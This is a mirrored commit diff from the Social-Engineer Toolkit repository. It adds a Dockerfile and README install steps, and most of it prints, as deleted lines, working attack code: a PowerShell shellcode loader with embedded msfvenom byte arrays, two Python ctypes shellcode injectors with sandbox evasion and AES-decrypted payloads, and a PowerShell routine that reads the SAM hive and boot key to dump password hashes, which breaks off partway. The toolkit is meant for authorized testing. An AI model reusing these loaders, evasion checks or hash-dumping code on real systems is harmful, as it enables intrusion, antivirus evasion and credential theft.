mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-25 05:50:18 +00:00
Merge branch 'master' into jeffmcjunkin-patch-1
This commit is contained in:
commit
018c866cf6
25 changed files with 56 additions and 2102 deletions
24
Dockerfile
Normal file
24
Dockerfile
Normal file
|
@ -0,0 +1,24 @@
|
|||
FROM ubuntu:latest
|
||||
|
||||
# Update sources and install git
|
||||
RUN apt update -y && apt install git -y && apt install python3-pip -y
|
||||
|
||||
#Git configuration
|
||||
RUN git config --global user.name "YOUR NAME HERE" \
|
||||
&& git config --global user.email "YOUR EMAIL HERE"
|
||||
|
||||
# Clone SETOOLKIT
|
||||
RUN git clone https://github.com/trustedsec/social-engineer-toolkit.git
|
||||
|
||||
# Change Working Directory
|
||||
WORKDIR /social-engineer-toolkit
|
||||
|
||||
# Install requirements
|
||||
RUN pip3 install -r requirements.txt
|
||||
|
||||
# Install SETOOLKIT
|
||||
RUN python3 setup.py
|
||||
|
||||
ENTRYPOINT [ "./setoolkit" ]
|
||||
|
||||
|
65
README.md
65
README.md
|
@ -1,42 +1,17 @@
|
|||
# :briefcase: The Social-Engineer Toolkit (SET) :briefcase:
|
||||
|
||||
Copyright 2020 The Social-Engineer Toolkit (SET)
|
||||
|
||||
Written by: David Kennedy (ReL1K) @HackingDave
|
||||
|
||||
Company: [TrustedSec](https://www.trustedsec.com)
|
||||
|
||||
DISCLAIMER: This is *only* for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.
|
||||
|
||||
Please read the LICENSE under readme/LICENSE for the licensing of SET.
|
||||
|
||||
|
||||
# :book: SET Tutorial :book:
|
||||
|
||||
For a full document on how to use SET, [visit the SET user manual](https://github.com/trustedsec/social-engineer-toolkit/raw/master/readme/User_Manual.pdf).
|
||||
|
||||
|
||||
# :computer: Features :computer:
|
||||
# The Social-Engineer Toolkit (SET)
|
||||
* Copyright :copyright: 2020
|
||||
* Written by: David Kennedy (ReL1K) @HackingDave
|
||||
* Company: [TrustedSec](https://www.trustedsec.com)
|
||||
|
||||
<br/>
|
||||
|
||||
## Description
|
||||
The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.
|
||||
|
||||
DISCLAIMER: This is *only* for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.
|
||||
Please read the LICENSE under readme/LICENSE for the licensing of SET.
|
||||
|
||||
## Bugs and enhancements
|
||||
|
||||
For bug reports or enhancements, please open an [issue](https://github.com/trustedsec/social-engineer-toolkit/issues) here.
|
||||
|
||||
|
||||
## Supported platforms
|
||||
|
||||
|
||||
* Linux :penguin:
|
||||
* Mac OS X :apple:
|
||||
|
||||
# :inbox_tray: Installation :inbox_tray:
|
||||
## Resolve dependencies
|
||||
*Ubuntu/Debian System*
|
||||
=======
|
||||
#### Supported platforms:
|
||||
* Linux
|
||||
* Mac OS X (experimental)
|
||||
|
||||
|
@ -50,12 +25,32 @@ python3 setup.py
|
|||
```
|
||||
|
||||
## Install SET
|
||||
=======
|
||||
* Mac OS X
|
||||
<br/>
|
||||
|
||||
*All OSs*
|
||||
## Installation
|
||||
#### Windows 10 WSL/WSL2 Kali Linux
|
||||
```bash
|
||||
sudo apt install set -y
|
||||
```
|
||||
Kali Linux on Windows 10 is a minimal installation so it doesn't have any tools installed.
|
||||
You can easily install Social Engineer Toolkit on WSL/WSL2 without needing pip using the above command.
|
||||
|
||||
#### Linux
|
||||
```bash
|
||||
git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
|
||||
cd setoolkit
|
||||
pip3 install -r requirements.txt
|
||||
python setup.py
|
||||
```
|
||||
<br/>
|
||||
|
||||
## SET Tutorial
|
||||
For a full document on how to use SET, [visit the SET user manual](https://github.com/trustedsec/social-engineer-toolkit/raw/master/readme/User_Manual.pdf).
|
||||
|
||||
<br/>
|
||||
|
||||
## Bugs and enhancements
|
||||
For bug reports or enhancements, please open an [issue](https://github.com/trustedsec/social-engineer-toolkit/issues) here.
|
||||
<br/>
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,45 +0,0 @@
|
|||
<#
|
||||
Powershell Code Execution 'Exploit'
|
||||
Author: Matthew Graeber (aka my superhero infosec crush)
|
||||
Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions.
|
||||
#>
|
||||
|
||||
# Import required functions
|
||||
$code = @"
|
||||
[DllImport("kernel32.dll")]
|
||||
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
||||
[DllImport("kernel32.dll")]
|
||||
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
||||
[DllImport("msvcrt.dll")]
|
||||
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
|
||||
"@
|
||||
|
||||
# Add CSharp code as a class recognized by Powershell
|
||||
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
|
||||
|
||||
# Copy and paste your shellcode here in the form 0xXX.
|
||||
# 32-bit payload
|
||||
# msfvenom windows/exec CMD="cmd /k calc" EXITFUNC=thread
|
||||
[Byte[]]$sc32 = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00
|
||||
|
||||
# 64-bit payload
|
||||
# msfpayload windows/x64/exec CMD="cmd /k calc" EXITFUNC=thread
|
||||
[Byte[]]$sc64 = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00
|
||||
|
||||
# Determine if Powershell is running as 32 or 64 bit
|
||||
[Byte[]]$sc = $sc32
|
||||
if ([IntPtr]::Size -eq 8) {$sc = $sc64}
|
||||
|
||||
# Calculate correct size param for VirtualAlloc
|
||||
$size = 0x1000
|
||||
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
|
||||
|
||||
# Allocate a page of memory. This will only work if the size parameter (3rd param) is at least 0x1000.
|
||||
# Allocate RWX memory block
|
||||
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
|
||||
|
||||
# I could have more easily used memcpy but that would have required the use of a particular .NET class to cast $sc as an IntPtr. I wanted to get this working without needing additional .NET classes. I prefer to KISS (keep it simple, stupid).
|
||||
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
|
||||
|
||||
# Execute you payload
|
||||
$winFunc::CreateThread(0,0,$x,0,0,0)
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,100 +0,0 @@
|
|||
#
|
||||
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
|
||||
# Version: 0.4
|
||||
#
|
||||
# This will spawn only a seperate thread per each shellcode instance.
|
||||
#
|
||||
# Much cleaner and optimized code. No longer needs files and is passed via
|
||||
# command line.
|
||||
#
|
||||
# Incorporates AES 256 Encryption when passing shellcode
|
||||
|
||||
import ctypes
|
||||
import sys
|
||||
import subprocess
|
||||
import os
|
||||
import base64
|
||||
from Crypto.Cipher import AES
|
||||
import multiprocessing
|
||||
import threading
|
||||
|
||||
# added sandbox evasion here - most sandboxes use only 1 core
|
||||
if multiprocessing.cpu_count() < 2:
|
||||
exit()
|
||||
|
||||
# define our shellcode injection code through ctypes
|
||||
|
||||
|
||||
def injection(sc):
|
||||
sc = sc.decode("string_escape")
|
||||
sc = bytearray(sc)
|
||||
# Initial awesome code and credit found here:
|
||||
# http://www.debasish.in/2012_04_01_archive.html
|
||||
|
||||
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
|
||||
ctypes.c_int(len(sc)),
|
||||
ctypes.c_int(0x3000),
|
||||
ctypes.c_int(0x40))
|
||||
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
|
||||
ctypes.c_int(len(sc)))
|
||||
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
|
||||
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
|
||||
buf,
|
||||
ctypes.c_int(len(sc)))
|
||||
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
|
||||
ctypes.c_int(0),
|
||||
ctypes.c_int(ptr),
|
||||
ctypes.c_int(0),
|
||||
ctypes.c_int(0),
|
||||
ctypes.pointer(ctypes.c_int(0)))
|
||||
ctypes.windll.kernel32.WaitForSingleObject(
|
||||
ctypes.c_int(ht), ctypes.c_int(-1))
|
||||
if __name__ == '__main__':
|
||||
multiprocessing.freeze_support()
|
||||
subprocess.Popen("netsh advfirewall set global StatefulFTP disable",
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
# this will be our ultimate filename we use for the shellcode generate
|
||||
# by the Social-Engineer Toolkit
|
||||
try:
|
||||
|
||||
# our file containing shellcode
|
||||
if len(sys.argv[1]) > 1:
|
||||
payload_filename = sys.argv[1]
|
||||
if os.path.isfile(payload_filename):
|
||||
fileopen = open(payload_filename, "r")
|
||||
sc = fileopen.read()
|
||||
|
||||
# if we didn't file our shellcode path then exit out
|
||||
if not os.path.isfile(payload_filename):
|
||||
sys.exit()
|
||||
|
||||
if len(sys.argv[2]) > 1:
|
||||
# this is our secret key for decrypting the AES encrypted traffic
|
||||
secret = sys.argv[2]
|
||||
secret = base64.b64decode(secret)
|
||||
# the character used for padding--with a block cipher such as AES, the value
|
||||
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
|
||||
# used to ensure that your value is always a multiple of BLOCK_SIZE
|
||||
PADDING = '{'
|
||||
BLOCK_SIZE = 32
|
||||
# one-liner to sufficiently pad the text to be encrypted
|
||||
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
|
||||
# one-liners to decrypt a string which will be our shellcode
|
||||
DecryptAES = lambda c, e: c.decrypt(
|
||||
base64.b64decode(e)).rstrip(PADDING)
|
||||
cipher = AES.new(secret)
|
||||
# our decrypted value for shellcode
|
||||
sc = DecryptAES(cipher, sc)
|
||||
# split our shellcode into a list
|
||||
sc = sc.split(",")
|
||||
|
||||
# except an indexerror and allow it to continue forward
|
||||
except IndexError:
|
||||
sys.exit()
|
||||
|
||||
jobs = []
|
||||
for payload in sc:
|
||||
if payload != "":
|
||||
p = multiprocessing.Process(target=injection, args=(payload,))
|
||||
jobs.append(p)
|
||||
p.start()
|
Binary file not shown.
|
@ -1,56 +0,0 @@
|
|||
#!/usr/bin/python
|
||||
import ctypes
|
||||
import sys
|
||||
import multiprocessing
|
||||
|
||||
# Written by Dave Kennedy (ReL1K) @ TrustedSec.com
|
||||
# Injects shellcode into memory through Python and ctypes
|
||||
#
|
||||
# Initial awesome code and credit found here:
|
||||
# http://www.debasish.in/2012_04_01_archive.html
|
||||
|
||||
# added sandbox evasion here - most sandboxes use only 1 core
|
||||
if multiprocessing.cpu_count() < 2:
|
||||
exit()
|
||||
|
||||
# see if we specified shellcode
|
||||
try:
|
||||
sc = sys.argv[1]
|
||||
|
||||
# if we didn't specify a param
|
||||
except IndexError:
|
||||
sys.exit()
|
||||
|
||||
# need to code the input into the right format through string escape
|
||||
sc = sc.decode("string_escape")
|
||||
|
||||
# convert to bytearray
|
||||
sc = bytearray(sc)
|
||||
|
||||
# use types windll.kernel32 for virtualalloc reserves region of pages in
|
||||
# virtual address space
|
||||
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
|
||||
ctypes.c_int(len(sc)),
|
||||
ctypes.c_int(0x3000),
|
||||
ctypes.c_int(0x40))
|
||||
|
||||
# use virtuallock to lock region for physical address space
|
||||
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
|
||||
ctypes.c_int(len(sc)))
|
||||
|
||||
# read in the buffer
|
||||
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
|
||||
|
||||
# moved the memory in 4 byte blocks
|
||||
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
|
||||
buf,
|
||||
ctypes.c_int(len(sc)))
|
||||
# launch in a thread
|
||||
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
|
||||
ctypes.c_int(0),
|
||||
ctypes.c_int(ptr),
|
||||
ctypes.c_int(0),
|
||||
ctypes.c_int(0),
|
||||
ctypes.pointer(ctypes.c_int(0)))
|
||||
# waitfor singleobject
|
||||
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
|
File diff suppressed because it is too large
Load diff
Binary file not shown.
Binary file not shown.
Binary file not shown.
File diff suppressed because one or more lines are too long
|
@ -1,366 +0,0 @@
|
|||
#
|
||||
# PowerShell CreateCmd Bypass by Kathy Peters, Josh Kelley (winfang) and Dave Kennedy (ReL1K)
|
||||
# Defcon Release
|
||||
#
|
||||
#
|
||||
#
|
||||
function LoadApi
|
||||
{
|
||||
$oldErrorAction = $global:ErrorActionPreference;
|
||||
$global:ErrorActionPreference = "SilentlyContinue";
|
||||
$test = [PowerDump.Native];
|
||||
$global:ErrorActionPreference = $oldErrorAction;
|
||||
if ($test)
|
||||
{
|
||||
# already loaded
|
||||
return;
|
||||
}
|
||||
|
||||
$code = @'
|
||||
using System;
|
||||
using System.Security.Cryptography;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
|
||||
namespace PowerDump
|
||||
{
|
||||
public class Native
|
||||
{
|
||||
[DllImport("advapi32.dll", CharSet = CharSet.Auto)]
|
||||
public static extern int RegOpenKeyEx(
|
||||
int hKey,
|
||||
string subKey,
|
||||
int ulOptions,
|
||||
int samDesired,
|
||||
out int hkResult);
|
||||
|
||||
[DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
|
||||
extern public static int RegEnumKeyEx(
|
||||
int hkey,
|
||||
int index,
|
||||
StringBuilder lpName,
|
||||
ref int lpcbName,
|
||||
int reserved,
|
||||
StringBuilder lpClass,
|
||||
ref int lpcbClass,
|
||||
out long lpftLastWriteTime);
|
||||
|
||||
[DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
|
||||
extern public static int RegQueryInfoKey(
|
||||
int hkey,
|
||||
StringBuilder lpClass,
|
||||
ref int lpcbClass,
|
||||
int lpReserved,
|
||||
out int lpcSubKeys,
|
||||
out int lpcbMaxSubKeyLen,
|
||||
out int lpcbMaxClassLen,
|
||||
out int lpcValues,
|
||||
out int lpcbMaxValueNameLen,
|
||||
out int lpcbMaxValueLen,
|
||||
out int lpcbSecurityDescriptor,
|
||||
IntPtr lpftLastWriteTime);
|
||||
|
||||
[DllImport("advapi32.dll", SetLastError=true)]
|
||||
public static extern int RegCloseKey(
|
||||
int hKey);
|
||||
|
||||
}
|
||||
} // end namespace PowerDump
|
||||
|
||||
public class Shift {
|
||||
public static int Right(int x, int count) { return x >> count; }
|
||||
public static uint Right(uint x, int count) { return x >> count; }
|
||||
public static long Right(long x, int count) { return x >> count; }
|
||||
public static ulong Right(ulong x, int count) { return x >> count; }
|
||||
public static int Left(int x, int count) { return x << count; }
|
||||
public static uint Left(uint x, int count) { return x << count; }
|
||||
public static long Left(long x, int count) { return x << count; }
|
||||
public static ulong Left(ulong x, int count) { return x << count; }
|
||||
}
|
||||
'@
|
||||
|
||||
$provider = New-Object Microsoft.CSharp.CSharpCodeProvider
|
||||
$dllName = [PsObject].Assembly.Location
|
||||
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
|
||||
$assemblies = @("System.dll", $dllName)
|
||||
$compilerParameters.ReferencedAssemblies.AddRange($assemblies)
|
||||
$compilerParameters.GenerateInMemory = $true
|
||||
$compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code)
|
||||
if($compilerResults.Errors.Count -gt 0) {
|
||||
$compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) }
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
|
||||
$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
|
||||
$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
|
||||
$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
|
||||
$odd_parity = @(
|
||||
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
|
||||
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
|
||||
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
|
||||
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
|
||||
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
|
||||
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
|
||||
97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
|
||||
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
|
||||
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
|
||||
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
|
||||
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
|
||||
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
|
||||
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
|
||||
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
|
||||
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
|
||||
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
|
||||
);
|
||||
|
||||
function sid_to_key($sid)
|
||||
{
|
||||
$s1 = @();
|
||||
$s1 += [char]($sid -band 0xFF);
|
||||
$s1 += [char]([Shift]::Right($sid,8) -band 0xFF);
|
||||
$s1 += [char]([Shift]::Right($sid,16) -band 0xFF);
|
||||
$s1 += [char]([Shift]::Right($sid,24) -band 0xFF);
|
||||
$s1 += $s1[0];
|
||||
$s1 += $s1[1];
|
||||
$s1 += $s1[2];
|
||||
$s2 = @();
|
||||
$s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2];
|
||||
$s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2];
|
||||
return ,((str_to_key $s1),(str_to_key $s2));
|
||||
}
|
||||
|
||||
function str_to_key($s)
|
||||
{
|
||||
$key = @();
|
||||
$key += [Shift]::Right([int]($s[0]), 1 );
|
||||
$key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2);
|
||||
$key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3);
|
||||
$key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4);
|
||||
$key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5);
|
||||
$key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6);
|
||||
$key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7);
|
||||
$key += $([int]($s[6]) -band 0x7F);
|
||||
0..7 | %{
|
||||
$key[$_] = [Shift]::Left($key[$_], 1);
|
||||
$key[$_] = $odd_parity[$key[$_]];
|
||||
}
|
||||
return ,$key;
|
||||
}
|
||||
|
||||
function NewRC4([byte[]]$key)
|
||||
{
|
||||
return new-object Object |
|
||||
Add-Member NoteProperty key $key -PassThru |
|
||||
Add-Member NoteProperty S $null -PassThru |
|
||||
Add-Member ScriptMethod init {
|
||||
if (-not $this.S)
|
||||
{
|
||||
[byte[]]$this.S = 0..255;
|
||||
0..255 | % -begin{[long]$j=0;}{
|
||||
$j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
|
||||
$temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
|
||||
}
|
||||
}
|
||||
} -PassThru |
|
||||
Add-Member ScriptMethod "encrypt" {
|
||||
$data = $args[0];
|
||||
$this.init();
|
||||
$outbuf = new-object byte[] $($data.Length);
|
||||
$S2 = $this.S[0..$this.S.Length];
|
||||
0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
|
||||
$i = ($i+1) % $S2.Length;
|
||||
$j = ($j + $S2[$i]) % $S2.Length;
|
||||
$temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
|
||||
$a = $data[$_];
|
||||
$b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
|
||||
$outbuf[$_] = ($a -bxor $b);
|
||||
}
|
||||
return ,$outbuf;
|
||||
} -PassThru
|
||||
}
|
||||
|
||||
function des_encrypt([byte[]]$data, [byte[]]$key)
|
||||
{
|
||||
return ,(des_transform $data $key $true)
|
||||
}
|
||||
|
||||
function des_decrypt([byte[]]$data, [byte[]]$key)
|
||||
{
|
||||
return ,(des_transform $data $key $false)
|
||||
}
|
||||
|
||||
function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
|
||||
{
|
||||
$des = new-object Security.Cryptography.DESCryptoServiceProvider;
|
||||
$des.Mode = [Security.Cryptography.CipherMode]::ECB;
|
||||
$des.Padding = [Security.Cryptography.PaddingMode]::None;
|
||||
$des.Key = $key;
|
||||
$des.IV = $key;
|
||||
$transform = $null;
|
||||
if ($doEncrypt) {$transform = $des.CreateEncryptor();}
|
||||
else{$transform = $des.CreateDecryptor();}
|
||||
$result = $transform.TransformFinalBlock($data, 0, $data.Length);
|
||||
return ,$result;
|
||||
}
|
||||
|
||||
function Get-RegKeyClass([string]$key, [string]$subkey)
|
||||
{
|
||||
switch ($Key) {
|
||||
"HKCR" { $nKey = 0x80000000} #HK Classes Root
|
||||
"HKCU" { $nKey = 0x80000001} #HK Current User
|
||||
"HKLM" { $nKey = 0x80000002} #HK Local Machine
|
||||
"HKU" { $nKey = 0x80000003} #HK Users
|
||||
"HKCC" { $nKey = 0x80000005} #HK Current Config
|
||||
default {
|
||||
throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
|
||||
}
|
||||
}
|
||||
$KEYQUERYVALUE = 0x1;
|
||||
$KEYREAD = 0x19;
|
||||
$KEYALLACCESS = 0x3F;
|
||||
$result = "";
|
||||
[int]$hkey=0
|
||||
if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
|
||||
{
|
||||
$classVal = New-Object Text.Stringbuilder 1024
|
||||
[int]$len = 1024
|
||||
if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
|
||||
[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
|
||||
{
|
||||
$result = $classVal.ToString()
|
||||
}
|
||||
else
|
||||
{
|
||||
Write-Error "RegQueryInfoKey failed";
|
||||
}
|
||||
[PowerDump.Native]::RegCloseKey($hkey) | Out-Null
|
||||
}
|
||||
else
|
||||
{
|
||||
Write-Error "Cannot open key";
|
||||
}
|
||||
return $result;
|
||||
}
|
||||
|
||||
function Get-BootKey
|
||||
{
|
||||
$s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
|
||||
$b = new-object byte[] $($s.Length/2);
|
||||
0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
|
||||
$b2 = new-object byte[] 16;
|
||||
0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
|
||||
return ,$b2;
|
||||
}
|
||||
|
||||
function Get-HBootKey
|
||||
{
|
||||
param([byte[]]$bootkey);
|
||||
$aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
|
||||
$anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
|
||||
$k = Get-Item HKLM:\SAM\SAM\Domains\Account;
|
||||
if (-not $k) {return $null}
|
||||
[byte[]]$F = $k.GetValue("F");
|
||||
if (-not $F) {return $null}
|
||||
$rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
|
||||
$rc4 = NewRC4 $rc4key;
|
||||
return ,($rc4.encrypt($F[0x80..0x9F]));
|
||||
}
|
||||
|
||||
function Get-UserName([byte[]]$V)
|
||||
{
|
||||
if (-not $V) {return $null};
|
||||
$offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
|
||||
$len = [BitConverter]::ToInt32($V[0x10..0x13],0);
|
||||
return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
|
||||
}
|
||||
|
||||
function Get-UserHashes($u, [byte[]]$hbootkey)
|
||||
{
|
||||
[byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
|
||||
|
||||
# check if hashes exist (if byte memory equals to 20, then we've got a hash)
|
||||
$LM_exists = $false;
|
||||
